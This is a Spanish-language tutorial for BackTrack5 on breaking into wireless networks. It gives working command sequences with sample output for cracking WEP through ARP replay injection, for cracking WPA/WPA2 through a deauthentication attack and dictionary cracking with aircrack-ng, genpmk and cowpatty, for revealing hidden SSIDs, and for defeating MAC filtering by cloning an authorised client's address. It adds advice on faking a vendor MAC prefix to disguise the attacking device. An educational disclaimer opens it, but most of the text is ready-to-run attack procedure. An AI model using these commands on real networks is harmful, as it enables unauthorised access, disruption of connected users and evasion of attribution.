Criptado y Crackeo Wep (mtodo de aceleracin: Airodump,Aireplay,Aircrack); Criptado y Crackeo WPA/WPA2 (mtodo de aceleracin :Aircrack,Genpmk,Cowpatty); Como descubrir un punto

de acceso invisible (Hidden SSID); Como clonar una direccin MAC; Como evitar los filtros MAC;

Mihai Valentin Dumitru

Those who escape hell, however, never talk about it and nothing much bothers them after that. Charles Bukowski

Vulnerabilidades WLAN(WEP/WPA/WPA2/PSK)

Antes de poner en prctica toda la informacin que contiene este manual, deberan pensar cul es el motivo de su uso. Este manual ha sido creado con fines estrictamente educativos y los que utilicen esta informacin para lograr objetivos que podran considerarse no muy ticos, asumirn tanto la responsabilidad como las consecuencias de sus hechos. Para poder aplicar toda esta informacin, se requiere un equipo dotado con una plataforma Backtrack5. Este Sistema Operativo, se puede descargar accediendo a la pgina oficial de Backtrack http://www.backtrack-linux.org/downloads/ . Es aconsejable instalar el sistema en el equipo, pero como alternativa, o crear una maquina virtual y ejecutar el Backtrack a travs de la misma mquina virtual. Contando con el hecho de que la teora y la prctica son independientes, vamos a empezar con la prctica intentando explicar y debatir, en paralelo, todo lo que implica esta parte. Vamos a empezar abriendo la consola (terminal) Backtrack y creando una interfaz de monitorizacin mon0. Para poder crear la interfaz de monitorizacin, vamos a introducir en la consola Backtrack5 el comando airmon-ng start wlan0

root@bt:~# airmon-ng start wlan0 Interface Chipset wlan0 (Fabricant)

Driver (driver) (monitor mode enabled on mon0)

Para comprobar si la interfaz ha sido creada con xito introducimos airmon-ng.

root@bt:~# airmon-ng Interface wlan0 mon0

Chipset (Fabricant) (Fabricant)

Driver (driver)

Tambin se puede comprobar introduciendo ifconfig. En el caso en el que se haya creado con xito, la interfaz mon0 ser mostrada en la consola:

root@bt:~# ifconfig lo Link encap:Local Loopback inet addr:127.0.0.1 Mask 255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric 1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrer:0 mon0 Link encap:UNSPEC Hwaddr:00:02:A5:B8:B0:53:00:00:00:00:00:00:00:00 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3794 errors:0 dropped:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrer:0 wlan0 Link encap Ethernet Hwaddr:00:02:A5:B8:B0:53 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrer:0 colissions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

Criptado WEP y el metodo de crackeo:

Suponiendo que ya hemos activado una interfaz de monitorizacin mon 0, vamos a escanear los alrededores para poder localizar un punto de acceso (AP-Access Point). Para ello, introduciremos el comando airodump-ng mon0

root@bt:~# airodump-ng mon0 CH11 BSSID 1C:1D:67:10:06:E5 BSSID ][ Elapsed : 40 s ][ Data/Ora ] PWR RXQ Beacons -10 70 7206 #Data , #s 88 PWR -20 0 CH Mb ENC CIPHER AUTH ESSID WEP Probes Romtelecom Romtelecom

11 54. WEP Lost 0

STATION

Rate 0 -1

Packet 3

1C:1D:67:10:06:E5 06:02:A8:C8:C0:23

Vamos a elegir el punto de acceso con ESSID Romtelecom y MAC 1C:1D:67:10:06:E5 e iniciaremos el proceso de captura de paquetes de datos introduciendo el comando: airodump-ng bssid 1C:1D:67:10:06:E5 c 11 w crackromtelecom mon0 -bssid la direccin MAC del punto de acceso Romtelecom -c 11 -el canal 11 o la frecuencia de emisin del punto de acceso Romtelecom -w crackromtelecom el nombre del archivo en el que se almacenaran los paquetes de datos root@bt:~# airodump-ng bssid 1C:1D:67:10:06:E5 c 11 w crackromtelecom mon0

CH11 BSSID

][ Elapsed : 1 min 25 s ] [ Data/Ora ][ 140 bytes keystream 1C:1D:67:10:06:E5 ] PWR RXQ Beacons -13 70 9206 #Data , #s 168 PWR -26 0 CH Mb ENC CIPHER AUTH ESSID WEP Probes Romtelecom Romtelecom

1C:1D:67:10:06:E5 BSSID

11 54. WEP Lost 0

STATION

Rate 0-1

Packet 20

1C:1D:67:10:06:E5 06:02:A8:C8:C0:23

Podemos ver que ya existe un cliente conectado al punto de acceso Romtelecom. Este mismo cliente nos ayudara a obtener el volumen de datos (#Data) necesario para poder llevar a cabo el proceso de crackeo. A lo largo del tiempo, he observado muchos tutoriales dedicados a la explotacin de este tipo de vulnerabilidades, pero a la vez, he observado que la mayora de los que publicaron los tutoriales no aplicaron el mtodo de aceleracin del mismo proceso. Porque? A continuacin, intentare explicar, en la medida de mis posibilidades, como aplicar este proceso tan necesario e imprescindible. Digo imprescindible, porque el mtodo de aceleracin nos ayudara a reducir el tiempo empleado de horas a minutos (5-10 minutos). Iniciamos la captura de paquetes de datos ARP (ARP Packets) utilizando el comando aireplayng. La misma utilidad, nos ayudara a reproducir e inyectar los paquetes capturados en la red, obteniendo, de esta forma, el volumen de datos necesario para llevar a cabo el proceso de crackeo. Cuntos ms paquetes ARP se capturen y se reproduzcan, ms aumentamos el flujo de datos en la red, reduciendo de esta forma, el tiempo empleado. He de mencionar que el protocolo ARP, es un protocolo que contiene un volumen de datos preestablecido e igual en todos los casos. Utilizando esta informacin, vamos a poder reconocer y distinguir los paquetes ARP incluidos en el trfico de datos de la red. Para ello, abrimos otra consola e introducimos el comando: aireplay-ng -3 b 1C:1D:67:10:06:E5 h 06:02:A8:C8:C0:23 mon0 root@bt:~# aireplay-ng -3 b 1C:1D:67:10:06:E5 h 06:02:A8:C8:C0:23 mon0 root@bt:~# aireplay-ng -3 b 1C:1D:67:10:06:E5 h 06:02:A8:C8:C0:23 mon0 The interface MAC (00:02:A5:B8:B0:53) doesnt match the specified MAC (-h). Ifconfig mon0 hw ether 06:02:A8:C8:C0:23 4:02:27 Waiting for beacon frame (BSSID: 1C:1D:67:10:06:E5) on channel 11 Saving ARP requests in replay_arp-10-037987.cap You should also start airodump-ng to capture replies. Read 7032 packets (got 2016 ARP requests and 2010 ACKs), sent 1934 packets(500 pps) -3 la opcin para la reproduccin de paquetes ARP packets; -b La direccin MAC del punto de acceso (router); -h La direccin MAC del cliente (ordenador) a el que le vamos a utilizar a reproducir los paquetes ARP Mirando la consola en la que se est ejecutando airodump-ng vais a ver que el volumen de datos esta aumentado, debido al proceso de aceleracin generado por la utilidad aireplay

CH11 BSSID

][ Elapsed : 3 min 25 s ][ Data/Ora ][ 140 bytes keystream 1C:1D:67:10:06:E5 ] PWR RXQ Beacons -13 70 19206 #Data , #s 16825 PWR -26 0 CH Mb ENC CIPHER AUTH ESSID WEP Probes Romtelecom Romtelecom

1C:1D:67:10:06:E5 BSSID

11 54. WEP Lost 0

STATION

Rate 0-1

Packet 20

1C:1D:67:10:06:E5 06:02:A8:C8:C0:23

Abrid una consola (terminal) nueva e introducid el comando aircrack-ng crackromtelecom-01.cap -crackromtelecom-01.cap es el archivo en el que se estn almacenando los paquetes de datos.

NOTA: Aunque hayamos introducido el comando aircrack-ng crackromtelecom-01.cap, este archivo seguir almacenando los paquetes de datos, tal y como veremos a continuacin, sin que importe si no hemos logrado obtener a la primera, la clave wifi (WEPKEY). root@bt:~# aircrack-ng crackromtelecom-01.cap Opening crackromtelecom-01.cap Read 168992 packets. # 1 BSSID 1C:1D:67:10:06:E5 ESSID Romtelecom Encryption WEP (12336 IVs)

Choosing first network as target. Opening crackromtelecom-01.cap Reading packets, please wait Los resultados mostrados en la consola sern mas o menos similares a los resultados que salen en la imagen siguiente. Hemos decidido sustituir los valores reales por X por razones comprensibles.

Aircrack-ng 1.0 [00:00:00] Tested XXXXXX keys (got 12456 IVs) KB 0 1 2 3 4 5 6 7 8 9 10 11 12 depth 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 byte(vote) XX( 512) XX( 256) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512) XX( 256) XX( 512) XX( 256) XX( 512) XX( 256) XX( 768) XX( 512) XX( 256) XX( 512) XX( 768) XX( 512) XX( 256) XX( 256) XX( 768) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512) XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 512) XX( 512) XX( 512) XX( 256) XX( 512) XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 512) XX( 512) XX( 256) XX( 512) XX( 512) XX( 256) XX( 512) XX( 256) XX( 512) XX( 512)

Es muy probable que no obtengamos la contrasea (clave WEP) a la primera. Aircrack-ng 1.0 [00:00:00] Tested XXXXXX keys (got 12500 IVs) KB 1 2 3 4 5 6 depth 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 byte(vote) XX( 256) XX( XX( 512) XX( XX( 512) XX( XX( 512) XX( XX( 512) XX( XX( 768) XX( 256) 256) 256) 256) 256) 512) XX( XX( XX( XX( XX( XX( 256) 256) 256) 256) 256) 512) XX( XX( XX( XX( XX( XX( 256) 256) 256) 512) 512) 512) XX( XX( XX( XX( XX( XX( 256) 512) 512) 512) 256) 256) XX( XX( XX( XX( XX( XX( 256) 256) 256) 256) 256) 256) XX( XX( XX( XX( XX( XX( 256) 512) 512) 256) 512) 512)

Failed. Next try with 15000 IVs No tenis porque preocuparos, normalmente, el proceso de crackeo puede llegar a durar horas, y depende totalmente, del volumen de datos capturados y reinyectados en la red. Pero, al haber invocando la utilidad <aireplay> vamos a reducir el tiempo empleado de horas a minutos. Analicemos la sintaxis Failed. Next try with 15000 IVs donde IV (Initialization Vector). El proceso de crackeo se ha detenido porque todava no hemos logrado obtener el volumen de datos necesario para el clculo de la clave WEP. El mismo proceso se reiniciara en cuanto el numero de vectores de inicializacin alcance el valor 15000, porque, una vez activada la utilidad <aircrack>, la misma utilidad, est configurada para reiniciar un proceso de clculo de la clave WEP cada 5000 IV. En cuanto dispongamos de un numero de paquetes de datos suficiente, <aircrack> calculara la clave WEP y la mostrara en la consola, tal y como veremos en la imagen siguiente.

Aircrack-ng 1.0 [00:00:00] Tested XXXXXX keys (got 20756 IVs) KB 0 1 2 3 4 5 6 7 8 9 10 11 12 depth 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 0/ 1 byte(vote) XX( 512) XX( 256) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512) XX( 256) XX( 512) XX( 256) XX( 512) XX( 256) XX( 768) XX( 512) XX( 256) XX( 512) XX( 768) XX( 512) XX( 256) XX( 256) XX( 768) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512) XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 512) XX( 512) XX( 512) XX( 256) XX( 512) XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 512) XX( 512) XX( 256) XX( 512) XX( 512) XX( 256) XX( 512) XX( 256) XX( 512) XX( 512)

KEY FOUND [ XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX ] Decrypted correctly : 100% Para poder descifrar (crackear) la clave WEP de un punto de acceso, en nuestro caso Romtelecom, lo nico que necesitaremos, es capturar, reproducir (simular) y reinyectar un nmero suficiente de paquetes de datos. Una contrasea WEP se puede calcular sin que importe el nmero de caracteres o la complexidad de la misma.

Criptado WPA/WPA2 y el mtodo de crackeo:

WPA es un protocolo de seguridad que utiliza como algoritmo de cifrado el TKIP (Temporal Key Integrity Protocol). Hemos de mencionar que tanto el protocolo WEP como el WPA utilizan el mismo Algoritmo de cifrado para encriptar los paquetes de datos, con la nica diferencia, que el WPA genera las claves de otra manera. WPA2 fue diseado para mejorar la versin WPA, utilizando como algoritmo de cifrado el AES (Advanced Encryption Standard). Tal y como veremos a continuacin, tanto el protocolo WPA como el WPA2, son vulnerables a un ataque de diccionario. Para poder llevar a cabo con xito un ataque a WPA/WPA2 vamos a necesitar dos factores:

1.

Un diccionario bien definido que contenga frases especificas de la zona geogrfica (pais) en la que os encontris. 2. El segundo factor consta en capturar un saludo de 4 vas (WPA Handshake). A continuacin vamos a explicar y analizar el mtodo de funcionamiento del saludo a 4 vas:

Muchos llegaran a preguntarse Que es un PTK o como se genera?. PTK (Paiwise Transition Keys) es una clave de cifrado que se utiliza en el proceso WPA y se obtiene concatenando los siguientes factores:

1. 2.

3. 4. 5.

La direccin MAC del punto de acceso (router); La direccin MAC del cliente(ordenador); La PMK o (PSK); El valor (Anonce) generado por el punto de acceso; El valor (Snonce) generado por el cliente;

Antes de empezar el proceso de crackeo, hemos de saber que, tanto el procedimiento como los pasos que tenemos que seguir para obtener la clave, serian los mismos sin importar de que protocolo se tratase (WPA/WPA2). Suponiendo que ya hemos configurado el punto de acceso Romtelecom para que aplicase una proteccin WPA, vamos a abrir una consola e introduciremos la orden siguiente: airodump-ng bssid 1C:1D:67:10:06:E5 c 11 w crackromtelecomWPA mon0 root@bt:~# airodump-ng bssid 1C:1D:67:10:06:E5 c 11 w crackromtelecomWPA mon0 CH11 BSSID 1C:1D:67:10:06:E5 BSSID ][ Elapsed : 1 min 05 s ] [ Data/Ora ] PWR RXQ Beacons -15 70 1206 #Data , #s 10 PWR 0 CH Mb ENC CIPHER AUTH ESSID TKIP Probes Romtelecom

11 54. WPA Lost

STATION

Rate

Packet

Como habamos dicho, para poder iniciar un ataque a diccionario, necesitaremos capturar el saludo a 4 vas que se efecta entre un cliente y el punto de acceso. Este saludo se realiza en el momento en el que el cliente intenta conectarse al punto de acceso. Para ello tendramos que coincidir con un cliente o simplemente obligar a los clientes que ya estn conectados al punto de acceso Romtelecom, a desconectarse y as capturar el saludo a 4 vas que realizara al volver a conectarse al punto de acceso. Para ello vamos a efectuar un ataque de autenticacin (DOS) siguiendo 2 pasos:

1. 2.

Abriendo o consola nueva Backtrack; Ejecutando la orden aireplay-ng -deauth 1 a 1C:1D:67:10:06:E5 mon 0

root@bt:~# aireplay-ng -deauth 1 a 1C:1D:67:10:06:E5 mon 0 06:20:06 Waiting for beacon frame (BSSID 1C:1D:67:10:06:E5) on channel 11 NB:This attack is more effective when targeting a connected wireless client(-c <clients MAC>). 06:20:06 Sending DeAuth to broadcast - BSSID: [1C:1D:67:10:06:E5] root@bt:~# En cuanto el cliente intentara conectarse, al haber sido obligado a desconectarse tras el ataque de de autenticacin DOS, la utilidad <airodump> que ya se esta ejecutando, capturara el saludo a 4 vas. La confirmacin ser mostrada en la esquina superior derecha de la consola:

CH11 BSSID

][ Elapsed : 16 min 05 s ] [ Data/Ora ][ WPA Handshake 1C:1D:67:10:06:E5 ] PWR RXQ Beacons -16 STATION 70 #Data , #s 3566 PWR -32 CH Mb 108 Rate 0-1 Lost 0 ENC CIPHER AUTH ESSID 0 11 Packet 30 54. Probes Romtelecom WPA TKIP

1C:1D:67:10:06:E5 Romtelecom BSSID

1C:1D:67:10:06:E5 06:02:A8:C8:C0:23

Una vez obtenido el saludo a 4 vas, WPA Handshake 1C:1D:67:10:06:E5 iremos a la consola en la que se est ejecutando la utilidad <airodump> e interrumpiremos el proceso pulsando Ctrl-C. Antes de iniciar el proceso de crackeo hemos de saber que, en el caso de un ataque WPA/WPA2, la eficacia del ataque depende en su totalidad del diccionario de l que dispondrais. Backtrack5 contiene un diccionario almacenado en un archivo llamado darKcode.lst, pero a lo largo del tiempo hemos observado que el mismo diccionario no es muy eficaz a la hora de efectuar un ataque a un punto de acceso situado en Europa de Este y tampoco en la Europa Central o de Oeste (Espaa,Francia,Italia). Aun as, os puedo asegurar que, gracias a la colaboracin de los grupos de Anonymous que activan en zonas distintas del planeta, se han realizado varios diccionarios que contienen frases especificas de las dichas zonas. Puesto que este manual ha sido creado con fines educativos y demonstrativos, nos vamos a limitar a utilizar el mismo diccionario del Backtrack5. Para acceder al diccionario vamos a tener que introducir en una consola el siguiente comando: aircrack-ng crackromtelecomWPA.cap w /pentest/passwords/wordlists/darkc0de.lst root@bt:~# aircrack-ng crackromtelecomWPA.cap w /pentest/passwords/wordlists/darkc0de.lst

Aircrack-ng 1.0 [00:00:00] Tested 876890 keys (726.6 k/s)

KEY FOUND! [XXXXXXXXX] Master Key: Transient Key: XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX

EAPOL HMAC:

XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX

Una vez calculada la clave, la misma clave se mostrara en la consola KEY FOUND! [XXXXXXXXX]

A continuacin debatiremos el mtodo de aceleracin del proceso de crackeo: Para poder acelerar el proceso de crackeo WPA y a la vez reducir el tiempo empleado vamos a tener que calcular el valor del factor PMK (Pairwise Master Key) o PSK (Pre-shared key) es decir, la clave precompartida. El factor PMK (PSK) se obtiene concatenando otros dos factores importantes: 1. 2. El valor SSID (en nuestro caso Romtelecom); La clave;

Para ello utilizaremos un generador PMK llamado genpmk abriendo una consola e introduciendo el comando: genpmk -f /pentest/passwords/wordlists/darkc0de.lst d PMK-crackromtelecomWPA -s Romtelecom root@bt:~# genpmk -f /pentest/passwords/wordlists/darkc0de.lst d PMK-crackromtelecomWPA -s Romtelecom genpmk 1.1 WPA-PSK precomputation atack. <jwright@hasborg.com> File PMK-crackromtelecomWPA does not exist, creating. key no. 1000:XXXXXXX key no. 2000:XXXXXXXXX key no. 3000:XXXXX key no. 4000:XXXXXXXX key no. 5000:XXXXXXX key no. 6000:XXXXXXXXXX Puesto que ya tenemos la PMK, vamos a extraer la contrasea WIFI ejecutando la utilidad cowpatty. Para ello introducimos el comando: cowpatty d PMK-crackromtelecomWPA s Romtelecom r crackromtelecomWPA-01.cap root@bt:~# cowpatty d PMK-crackromtelecomWPA s Romtelecom r crackromtelecomWPA01 .cap Collected all necessary data to mount crack against WPA/PSK passphrase. Starting dictionary atack. Please be patient. key key key key key key key key key key key key key key key key key key no. no. no. no. no. no. no. no. no. no. no. no. no. no. no. no. no. no. 1000:XXXXXXX 2000:XXXXXXXXX 3000:XXXXX 4000:XXXXXXXX 5000:XXXXXXX 6000:XXXXXXXXXX 7000:XXXXXXXX 8000:XXXXXXXX 9000:XXXXXXX 10000:XXXXXXXX 11000:XXXXXX 12000:XXXXXXXX 13000:XXXXXXXXXXX 14000:XXXXXXXXX 15000:XXXXXXXXXX 16000:XXXXXXXXXXXX 17000:XXXXXXXXX 18000:XXXXXXXXXXXXXX

En cuanto se haya calculado con xito la contrasea, se mostrara en la consola: key key key key key key key key key key key key no. no. no. no. no. no. no. no. no. no. no. no. 111000:XXXXXXX 112000:XXXXXXXXX 113000:XXXXX 114000:XXXXXXXX 115000:XXXXXXX 116000:XXXXXXXXXX 117000:XXXXXXXX 118000:XXXXXXXX 119000:XXXXXXX 120000:XXXXXXXX 121000:XXXXXX 122000:XXXXXXXX

The PSK is XXXXXXXX 122000 passphrases tested in [X] seconds. [X] passphrases/sec

Como descubrir un punto de acceso invisible (Hidden SSID)

Vamos a ver lo fcil que es descubrir un punto de acceso invisible (Hidden SSID) Para ello vamos a tener que ejecutar la utilidad <airodump>. CH11 BSSID 1C:1D:67:10:06:E5 28:EF:01:35:32:64 BSSID 28:EF:01:35:32:64 ][ Elapsed : 0 min 05 s ] [ Data/Ora ][ PWR RXQ Beacons -16 -42 70 17 3566 0 #Data , #s 108 0 PWR -32 0 6 CH Mb 11 54e 11 54e Lost 0 ENC CIPHER AUTH ESSID WPA WPA TKIP TKIP Probes <length: 6> Romtelecom <length: 6>

STATION 06:02:A8:C8:C0:23

Rate 0-1

Packet 30

El mtodo consta en esperar a que un cliente (ordenador) autorizado se conecte al punto de acceso invisible. Cada vez que un cliente autorizado intenta conectarse a un punto de acceso invisible el mismo cliente genera una solicitud de prueba (Probe request). El punto de acceso (router) recibir la solicitud del cliente y le mandara al mismo cliente un respuesta de prueba (Probe response). Tanto la solicitud como la respuesta contienen la SSID del punto de acceso, delatando de esta manera, la presencia del punto de acceso invisible El punto de acceso invisible se mostrara en la pantalla.<length: 6>.

Como engaar el filtrado MAC (MAC Filters)

El filtrado MAC es una medida de seguridad que cuenta con un listado que contiene las direcciones MAC de los clientes autorizados. Todos los dems dispositivos, cuyas direcciones MAC no estn incluidas en el listado de filtrado MAC, gestionado por el administrador de red, no obtendrn la autorizacin para poder conectarse al punto de acceso. A continuacin vamos a ver lo fcil que es engaar los filtros MAC, clonando la direccin MAC de un cliente autorizado. En una consola BackTrack/Linux, vamos a introducir el comando: airodump-ng c11 a bssid <MAC_punto_de_acceso> mon0 En nuestro caso utilizaremos un punto de acceso con ESSID Romtelecom y cuya direccin MAC sera 1C:1D:67:10:06:E5: root@bt:~# airodump-ng c11 a bssid 1C:1D:67:10:06:E5 mon0 El resultado mostrado en la pantalla sera el siguiente: CH11 BSSID 1C:1D:67:10:06:E5 Romtelecom BSSID ][ Elapsed : 40 s ][2013 PWR RXQ Beacons -7 STATION 90 #Data , #s 206 PWR -14 Rate 0 -1 Lost 0 CH Mb ENC CIPHER AUTH ESSID 18 0 11 Probes Romtelecom 54e OPN

Packet 3

1C:1D:67:10:06:E5 06:02:A8:C8:C0:23 Donde:

-c 11 El canal o la frecuencia de emisin del punto de acceso; -a Esta opcin mostrar en la pantalla solamente las direcciones MAC de los clientes que ya han obtenido una autorizacin para poder conectarse. En cuanto la utilidad <airodump> muestra en la pantalla una direccin MAC de un cliente autorizado, en nuestro caso 06:02:A8:C8:C0:23, cambiaremos la direccin MAC de nuestro dispositivo por la direccin del dispositivo autorizado. Para ello hemos de seguir 4 pasos: 1. Vamos a tener que desactivar la interfaz wlan0: ifconfig wlan0 down

2.

Cambiamos la direccin MAC de nuestro dispositivo por la direccin MAC del cliente autorizado: macchanger -m 06:02:A8:C8:C0:23 wlan0

root@bt:~# macchanger -m 06:02:A8:C8:C0:23 wlan0 Current MAC: 00:02:A5:B8:B0:53 (Fabricant) Faked MAC: 06:02:A8:C8:C0:23 (Fabricant)

3.

Volvemos a activar la interfaz wlan0; ifconfig wlan0 up

4.

Comprobamos si el cambio se ha realizado con xito: macchanger --show wlan0

root@bt:~# macchanger --show wlan0 Current MAC: 06:02:A8:C8:C0:23 (Fabricant)

NOTA: Tal y como habis visto, la direccin MAC de vuestro dispositivo inalmbrico se puede cambiar sin problema alguno. Digamos que vuestro dispositivo inalmbrico es un dispositivo fabricado por CISCO y a la hora de efectuar un ataque queris que conste que estis utilizando un dispositivo fabricado, por ejemplo por INTEL o cualquier otro fabricante. En una consola ejecutad el comando: macchanger list Veris que en la misma consola se mostrara un listado con la mayora de los fabricantes y que a la vez contiene la huella MAC del mismo. Por ejemplo la huella MAC de INTEL es 00:90:27. Para cambiar la direccin MAC de CISCO por una de INTEL introducid: macchanger --mac 00:90:27:11:11:11 wlan0 00:90:27 la huella del fabricante;

Every person, I suppose ,has their eccentricities but in an effort to be normal in the worlds eye ,they overcome them and therefore destroy they special calling. Ive kept mine and do believe that they have lent generously to my existence.. Charles Bukowski

mihaivalentindumitru@gmail.com